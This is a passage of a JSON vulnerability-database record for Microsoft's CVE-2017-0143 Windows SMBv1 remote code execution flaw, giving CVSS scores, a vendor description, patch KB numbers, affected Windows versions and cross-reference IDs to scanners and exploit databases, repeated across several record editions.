"availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-03T18:46:41", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-03T18:46:41", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-03T18:46:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB3210721", "KB4012212", "KB3177186", "KB4012213", "KB4012217", "KBMS16-110, 3187754", "KB4012215", "KB3205409", "KB4012606", "KB3210720", "KB4012598", "KB4012216", "KB4013429", "KB4012214", "KB3213986", "KB4013198", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T18:46:41", "differentElements": ["msAffectedSoftware"], "edition": 5}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-03T20:42:24", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-03T20:42:24", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-03T20:42:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012216", "KB4012606", "KB4012215", "KB3212646", "KB4013429", "KB3205401", "KB4012213", "KB4012212", "KB4012217", "KB3205409", "KB4012598", "KB3210721", "KB4012214", "KB3177186", "KB4013198", "KB3210720", "KB3213986", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-03T20:42:24", "differentElements": ["msAffectedSoftware"], "edition": 6}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-04T06:47:20", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895"]}, {"type": "huawei", "idList": 